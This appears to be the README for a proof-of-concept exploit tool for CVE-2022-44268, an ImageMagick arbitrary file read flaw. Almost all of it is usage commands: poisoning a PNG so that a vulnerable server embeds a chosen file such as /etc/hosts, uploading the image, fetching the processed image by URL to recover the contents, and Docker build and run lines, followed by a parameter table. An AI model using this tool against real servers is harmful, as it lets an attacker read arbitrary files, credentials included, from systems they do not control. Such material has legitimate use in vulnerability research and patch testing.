CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit
Poison the image ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Upload poisoned PNG image.
Check if exploit was successful 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Build
docker build -t cve-2022-44268 .
Run
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
Parameter | Description | Type |
---|---|---|
--url | The URL of the uploaded PNG image | String |
--image | Input PNG file | File |
--output | Output PNG file | File |
--file-to-read | File to read from vulnerable host | String |